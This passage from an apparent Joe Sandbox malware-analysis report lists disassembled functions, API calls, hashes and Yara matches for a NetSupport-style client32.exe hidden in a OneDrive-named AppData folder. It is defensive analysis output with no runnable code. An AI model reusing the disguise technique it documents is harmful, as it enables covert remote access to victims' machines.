                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                        • String ID: Push
                                                        • API String ID: 1566154052-4278761818
                                                        • Opcode ID: c8e73f2153a96adabbe243cfa4b7c005f19ea282e9b9ca24df9cee0f30dd401a
                                                        • Instruction ID: 4df47a80590d2ff1575c8e4611685a7654965963f85dd39abc8717f1393e9050
                                                        • Opcode Fuzzy Hash: c8e73f2153a96adabbe243cfa4b7c005f19ea282e9b9ca24df9cee0f30dd401a
                                                        • Instruction Fuzzy Hash: 0251BBB5E04B45DFE721CF64C884B86FBE9EF04314F068599D89A9B281E730ED44CBA0
                                                        Function 6C808C00 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,?,00000000,?,6C80C0C1,?,00000000), ref: 6C808C23
                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 6C808C88
                                                        • Sleep.KERNEL32(00000000,?,6C80C0C1,?,00000000), ref: 6C808C9E
                                                        • LeaveCriticalSection.KERNEL32(6C849898,00000000), ref: 6C808CD0
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                        • String ID:
                                                        • API String ID: 4212191310-0
                                                        • Opcode ID: cc88ded87eac14b5002b615ea0662c446b19eddbf44271d4e752f133b9cdefea
                                                        • Instruction ID: ac6601904c9e8af4ef9ee664b7510706192d1325328fd85b47a5b5f96128e91e
                                                        • Opcode Fuzzy Hash: cc88ded87eac14b5002b615ea0662c446b19eddbf44271d4e752f133b9cdefea
                                                        • Instruction Fuzzy Hash: AF21D772B026049FDB319B19CE4069AB7BCBB9231CF164D37D85683A40D375A884CBD1
                                                        Function 009D1020 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCommandLineW.KERNEL32 ref: 009D1027
                                                        • GetStartupInfoW.KERNEL32(?), ref: 009D1084
                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?), ref: 009D109F
                                                        • ExitProcess.KERNEL32 ref: 009D10AC
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3741969770.00000000009D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true
                                                        • Associated: 0000000B.00000002.3741789673.00000000009D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_9d0000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                        • String ID:
                                                        • API String ID: 2164999147-0
                                                        • Opcode ID: 00f21dceda431ab95bda812473bacab2aecea015dfb1acc8267c49d9c95aef88
                                                        • Instruction ID: 1b6e84b5a536046b435753bbd0c90ed26596a44bfe4961759578494a5a13ff81
                                                        • Opcode Fuzzy Hash: 00f21dceda431ab95bda812473bacab2aecea015dfb1acc8267c49d9c95aef88
                                                        • Instruction Fuzzy Hash: 3811A166C843A5A6EB307B94CA0537676FCAF10781F54C81BEC85A3281E7649CC1C2A5
                                                        Function 11133070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(11027FDF,?,111332C3,?), ref: 1113307C
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\MSOneDrive\client32.exe,00000104,?,111332C3,?), ref: 11133099
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentFileModuleNameProcess
                                                        • String ID: C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                                        • API String ID: 2251294070-1094415277
                                                        • Opcode ID: a6c8bb78b7cff768986e440d02e8fb9d9739dc476a51eb8ebc485fd1644a9421
                                                        • Instruction ID: 95a860fb11ce3698bf83e103d73d4dee3427247e4625c7d7c027b33986acbc52
                                                        • Opcode Fuzzy Hash: a6c8bb78b7cff768986e440d02e8fb9d9739dc476a51eb8ebc485fd1644a9421
                                                        • Instruction Fuzzy Hash: D511E3317352529FEB049F65CB88B69FBE8AB8032AF10483CE819C73C9DB71E4418754
                                                        Function 110C57C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __strdup
                                                        • String ID: *this==pszSrc$..\CTL32\NSMString.cpp
                                                        • API String ID: 838363481-1175285396
                                                        • Opcode ID: 09327f646e07ade121880118fd776436c919fd30ebdfd1730cd527b45a0801e6
                                                        • Instruction ID: 977ead267f76f83ff3eab1d3ecdd9d4c93443979ce516d127c4424599980823c
                                                        • Opcode Fuzzy Hash: 09327f646e07ade121880118fd776436c919fd30ebdfd1730cd527b45a0801e6
                                                        • Instruction Fuzzy Hash: 5FF02D79F007065BC301DE19AC04B9BF7E9AF51658B1484B6ECA9D7311E531A4058BD1
                                                        Function 11109520 Relevance: 4.6, APIs: 3, Instructions: 69registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 11109571
                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 111095AE
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 111095B5
                                                          • Part of subcall function 11132450: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110291B,75A38400,?,?,1113451F,00000000,CSDVersion,00000000,00000000,?), ref: 11132470
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseValue$Query
                                                        • String ID:
                                                        • API String ID: 392431914-0
                                                        • Opcode ID: d01179d7914921633af1f95ba34bf02261fa1053a5ce10add05aa5ad212a0479
                                                        • Instruction ID: b6a822484d63e5f43720bc89d1637945e72db1cf2086c07164aebed0ca827549
                                                        • Opcode Fuzzy Hash: d01179d7914921633af1f95ba34bf02261fa1053a5ce10add05aa5ad212a0479
                                                        • Instruction Fuzzy Hash: 8011DD7A600219BBD701CE48DC45FEB77A9AFC4729F00C119FE198A186E371A60687B5
                                                        Function 11104920 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110494A
                                                        • __wsplitpath.LIBCMT ref: 11104965
                                                          • Part of subcall function 11157A24: __splitpath_helper.LIBCMT ref: 11157A66
                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 11104999
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                        • String ID:
                                                        • API String ID: 1847508633-0
                                                        • Opcode ID: e00128b51e07567abddb4f5e022b8e4f6c55213232340030c4bfcc7508d070b3
                                                        • Instruction ID: 41b85f1024430b5e478ef76c55f3555d5bba1c79e506978d3f2aac1c004cd1db
                                                        • Opcode Fuzzy Hash: e00128b51e07567abddb4f5e022b8e4f6c55213232340030c4bfcc7508d070b3
                                                        • Instruction Fuzzy Hash: 9D116175A40208ABDB15CB94CC42FEDF374AF49B04F5041D8EA246B1C0E7B02A48CB65
                                                        Function 11096D20 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D41
                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,110EC9C4,00000030,11130C07,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 11096D48
                                                          • Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,00000001,?,00000000), ref: 11096C88
                                                          • Part of subcall function 11096C50: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 11096CA4
                                                          • Part of subcall function 11096C50: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,0109D280,111DA704,?,00000001,00000001), ref: 11096CD0
                                                          • Part of subcall function 11096C50: EqualSid.ADVAPI32(?,0109D280,?,00000001,00000001), ref: 11096CE3
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 11096D67
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                        • String ID:
                                                        • API String ID: 2256153495-0
                                                        • Opcode ID: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
                                                        • Instruction ID: bef03fc96a11baf82ef458017e705a3ff4e764ad3467957e138692709f696853
                                                        • Opcode Fuzzy Hash: db81ee2fe5c491a2ccb29379fd95f1d0d1d742c7a3d4049ea7660b541be06c1b
                                                        • Instruction Fuzzy Hash: 6FF082B6E02218AFCB04DFB4ECC899EF7B8EB092087508079F82AC3205E635D900DF54
                                                        Function 11102C20 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • InitializeCriticalSection.KERNEL32(111DC098,82E0FB89,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C54
                                                        • EnterCriticalSection.KERNEL32(111DC098,82E0FB89,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102C70
                                                        • LeaveCriticalSection.KERNEL32(111DC098,?,?,?,?,-00000001,1116FF88,000000FF,?,11102CF8,00000001,?,11158063,?), ref: 11102CB8
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                        • String ID:
                                                        • API String ID: 3991485460-0
                                                        • Opcode ID: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
                                                        • Instruction ID: af8f5faaa0e43fc37bf2fbcfa483d918300548e7e4694db782cc55eb6f48ea86
                                                        • Opcode Fuzzy Hash: 21aed678011e1edbc94f63bc384b6260687119dd637fa6182ef04eff418a5b30
                                                        • Instruction Fuzzy Hash: 5C11C679A05314AFDB108F95CA88BDEF7A8FB46618F40472DEC12A3340DB75580087A1
                                                        Function 11064150 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11064212
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: ??CTL32.DLL
                                                        • API String ID: 1029625771-2984404022
                                                        • Opcode ID: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
                                                        • Instruction ID: 40d8bc6ab88db45c32dcc04311cf02eaab8fe64a48e70e25efc52a4fcd913f6e
                                                        • Opcode Fuzzy Hash: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
                                                        • Instruction Fuzzy Hash: 0B31F371A04786DFEB10CF18DC40B5ABBE8FB46324F0182AAE918DB380E731A800C791
                                                        Function 110258A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeA.KERNEL32(?), ref: 110258CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID: ?:\
                                                        • API String ID: 338552980-2533537817
                                                        • Opcode ID: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
                                                        • Instruction ID: 296434f9c912465af49bf9801cd890ec27f2c7e8f645fe9e776db7a9ee79c680
                                                        • Opcode Fuzzy Hash: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
                                                        • Instruction Fuzzy Hash: 14F0B461C053D97AEB22CE6084445C6BFE84F07269F64C8DEE8DA96541E2F6E184CB91
                                                        Function 110E2140 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 110E2100: RegCloseKey.ADVAPI32(?,00000000,?,110E214D,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E210D
                                                        • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C
                                                          • Part of subcall function 110E1EE0: wvsprintfA.USER32(?,00020019,?), ref: 110E1F0B
                                                        Strings
                                                        • Error %d Opening regkey %s, xrefs: 110E216A
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseOpenwvsprintf
                                                        • String ID: Error %d Opening regkey %s
                                                        • API String ID: 1772833024-3994271378
                                                        • Opcode ID: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
                                                        • Instruction ID: 3b3bc7d0e1a8f125228a4b9cdcbe5750d81a716439a92490548d771633bd724e
                                                        • Opcode Fuzzy Hash: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
                                                        • Instruction Fuzzy Hash: B4E0927A7012183FD710961A9C84EEBBB5DDBD66A8F00002AFA0487341C971DD0082B0
                                                        Function 11135660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(NSMTRACE,?,1102C5F4,110252E0,02D0B7D8,?,?,?,00000100,?,?,00000009), ref: 11135679
                                                          • Part of subcall function 111349D0: GetModuleHandleA.KERNEL32(NSMTRACE,11182A50), ref: 111349EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
